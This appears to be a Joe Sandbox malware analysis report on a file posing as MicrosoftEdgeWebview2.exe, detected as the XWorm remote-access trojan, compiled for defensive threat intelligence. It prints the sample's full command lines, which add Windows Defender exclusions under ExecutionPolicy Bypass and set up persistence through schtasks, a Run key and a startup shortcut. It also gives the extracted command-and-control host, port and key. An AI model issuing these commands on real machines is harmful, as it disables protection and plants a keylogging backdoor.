Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MicrosoftEdgeWebview2.exe

Overview

General Information

Sample name:MicrosoftEdgeWebview2.exe
Analysis ID:1501598
MD5:51a89f27afe7c3b57d5cdad473178934
SHA1:f945eba7f25f15d231f962143b8f0381270709fb
SHA256:e36aa73b955f2e30b2377dd33c6b55c798f7334ace728b0ad19187965cbe8196
Tags:exexworm
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • MicrosoftEdgeWebview2.exe (PID: 7632 cmdline: "C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe" MD5: 51A89F27AFE7C3B57D5CDAD473178934)
    • powershell.exe (PID: 7716 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7964 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftEdgeWebview2.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7324 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7300 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftEdgeWebview2.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7764 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeWebview2" /tr "C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • MicrosoftEdgeWebview2.exe (PID: 5408 cmdline: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe MD5: 51A89F27AFE7C3B57D5CDAD473178934)
  • MicrosoftEdgeWebview2.exe (PID: 5324 cmdline: "C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe" MD5: 51A89F27AFE7C3B57D5CDAD473178934)
  • MicrosoftEdgeWebview2.exe (PID: 2004 cmdline: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe MD5: 51A89F27AFE7C3B57D5CDAD473178934)
  • MicrosoftEdgeWebview2.exe (PID: 8068 cmdline: "C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe" MD5: 51A89F27AFE7C3B57D5CDAD473178934)
  • MicrosoftEdgeWebview2.exe (PID: 5800 cmdline: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe MD5: 51A89F27AFE7C3B57D5CDAD473178934)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["on-weighted.gl.at.ply.gg"], "Port": "15883", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
MicrosoftEdgeWebview2.exeJoeSecurity_XWormYara detected XWormJoe Security
    MicrosoftEdgeWebview2.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x87f4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x8891:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x89a6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x846c:$cnc4: POST / HTTP/1.1

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x87f4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x8891:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x89a6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x846c:$cnc4: POST / HTTP/1.1

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000000.1661069038.00000000008E2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000000.00000000.1661069038.00000000008E2000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x85f4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x8691:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x87a6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x826c:$cnc4: POST / HTTP/1.1
        Process Memory Space: MicrosoftEdgeWebview2.exe PID: 7632JoeSecurity_XWormYara detected XWormJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.0.MicrosoftEdgeWebview2.exe.8e0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            0.0.MicrosoftEdgeWebview2.exe.8e0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x87f4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x8891:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x89a6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x846c:$cnc4: POST / HTTP/1.1

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: New RUN Key Pointing to Suspicious Folder
            Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe, ProcessId: 7632, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeWebview2
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe", ParentImage: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe, ParentProcessId: 7632, ParentProcessName: MicrosoftEdgeWebview2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe', ProcessId: 7716, ProcessName: powershell.exe
            Sigma detected: Script Interpreter Execution From Suspicious Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe", ParentImage: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe, ParentProcessId: 7632, ParentProcessName: MicrosoftEdgeWebview2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe', ProcessId: 7324, ProcessName: powershell.exe
            Sigma detected: Suspicious Script Execution From Temp Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe", ParentImage: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe, ParentProcessId: 7632, ParentProcessName: MicrosoftEdgeWebview2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe', ProcessId: 7324, ProcessName: powershell.exe
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe", ParentImage: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe, ParentProcessId: 7632, ParentProcessName: MicrosoftEdgeWebview2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe', ProcessId: 7716, ProcessName: powershell.exe
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe, ProcessId: 7632, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeWebview2
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe", ParentImage: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe, ParentProcessId: 7632, ParentProcessName: MicrosoftEdgeWebview2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe', ProcessId: 7716, ProcessName: powershell.exe
            Sigma detected: Startup Folder File Write
            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe, ProcessId: 7632, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicrosoftEdgeWebview2.lnk
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeWebview2" /tr "C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeWebview2" /tr "C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe", ParentImage: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe, ParentProcessId: 7632, ParentProcessName: MicrosoftEdgeWebview2.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeWebview2" /tr "C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe", ProcessId: 7764, ProcessName: schtasks.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe", ParentImage: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe, ParentProcessId: 7632, ParentProcessName: MicrosoftEdgeWebview2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe', ProcessId: 7716, ProcessName: powershell.exe

            Suricata Signatures

            Timestamp:2024-08-30T07:19:29.560654+0200
            SID:2855924
            Severity:1
            Source Port:49738
            Destination Port:15883
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: MicrosoftEdgeWebview2.exeAvira: detected
            Antivirus detection for URL or domain
            Source: on-weighted.gl.at.ply.ggAvira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeAvira: detection malicious, Label: TR/Spy.Gen
            Found malware configuration
            Source: MicrosoftEdgeWebview2.exeMalware Configuration Extractor: Xworm {"C2 url": ["on-weighted.gl.at.ply.gg"], "Port": "15883", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
            Multi AV Scanner detection for domain / URL
            Source: on-weighted.gl.at.ply.ggVirustotal: Detection: 6%Perma Link
            Source: on-weighted.gl.at.ply.ggVirustotal: Detection: 6%Perma Link
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeReversingLabs: Detection: 81%
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeVirustotal: Detection: 69%Perma Link
            Multi AV Scanner detection for submitted file
            Source: MicrosoftEdgeWebview2.exeVirustotal: Detection: 69%Perma Link
            Source: MicrosoftEdgeWebview2.exeReversingLabs: Detection: 81%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: MicrosoftEdgeWebview2.exeJoe Sandbox ML: detected
            Sample uses string decryption to hide its real strings
            Source: MicrosoftEdgeWebview2.exeString decryptor: on-weighted.gl.at.ply.gg
            Source: MicrosoftEdgeWebview2.exeString decryptor: 15883
            Source: MicrosoftEdgeWebview2.exeString decryptor: <123456789>
            Source: MicrosoftEdgeWebview2.exeString decryptor: <Xwormmm>
            Source: MicrosoftEdgeWebview2.exeString decryptor:
            Source: MicrosoftEdgeWebview2.exeString decryptor: USB.exe
            Source: MicrosoftEdgeWebview2.exeString decryptor: %Temp%
            Source: MicrosoftEdgeWebview2.exeString decryptor: MicrosoftEdgeWebview2.exe
            Source: MicrosoftEdgeWebview2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: MicrosoftEdgeWebview2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49738 -> 147.185.221.20:15883
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: on-weighted.gl.at.ply.gg
            Source: global trafficTCP traffic: 192.168.2.4:49737 -> 147.185.221.20:15883
            Source: Joe Sandbox ViewIP Address: 147.185.221.20 147.185.221.20
            Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: on-weighted.gl.at.ply.gg
            Source: powershell.exe, 00000007.00000002.1991423534.000001C3E164F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
            Source: powershell.exe, 00000007.00000002.1991423534.000001C3E164F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
            Source: powershell.exe, 00000001.00000002.1756728657.0000019BA0790000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microse
            Source: powershell.exe, 00000001.00000002.1750884360.0000019B982E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1842304837.000001594D055000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1968790831.000001C3D8F65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2147441843.0000016A10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 0000000B.00000002.2026431273.0000016A00229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000001.00000002.1728941013.0000019B88498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786821910.000001593D208000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1882617486.000001C3C9119000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2026431273.0000016A00229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: MicrosoftEdgeWebview2.exe, 00000000.00000002.2925865924.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1728941013.0000019B88271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786821910.000001593CFE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1882617486.000001C3C8EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2026431273.0000016A00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000001.00000002.1728941013.0000019B88498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786821910.000001593D208000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1882617486.000001C3C9119000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2026431273.0000016A00229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: powershell.exe, 0000000B.00000002.2026431273.0000016A00229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000001.00000002.1756847376.0000019BA089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
            Source: powershell.exe, 00000001.00000002.1728941013.0000019B88271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786821910.000001593CFE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1882617486.000001C3C8EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2026431273.0000016A00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 0000000B.00000002.2147441843.0000016A10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000000B.00000002.2147441843.0000016A10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000000B.00000002.2147441843.0000016A10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 0000000B.00000002.2026431273.0000016A00229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000001.00000002.1750884360.0000019B982E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1842304837.000001594D055000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1968790831.000001C3D8F65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2147441843.0000016A10074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Contains functionality to log keystrokes (.Net Source)
            Source: MicrosoftEdgeWebview2.exe, XLogger.cs.Net Code: KeyboardLayout
            Source: MicrosoftEdgeWebview2.exe.0.dr, XLogger.cs.Net Code: KeyboardLayout

            Operating System Destruction

            barindex
            Protects its processes via BreakOnTermination flag
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess information set: 01 00 00 00 Jump to behavior

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: MicrosoftEdgeWebview2.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.0.MicrosoftEdgeWebview2.exe.8e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000000.1661069038.00000000008E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeCode function: 0_2_00007FFD9B6D12B90_2_00007FFD9B6D12B9
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeCode function: 0_2_00007FFD9B6D9E820_2_00007FFD9B6D9E82
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeCode function: 0_2_00007FFD9B6D0EF00_2_00007FFD9B6D0EF0
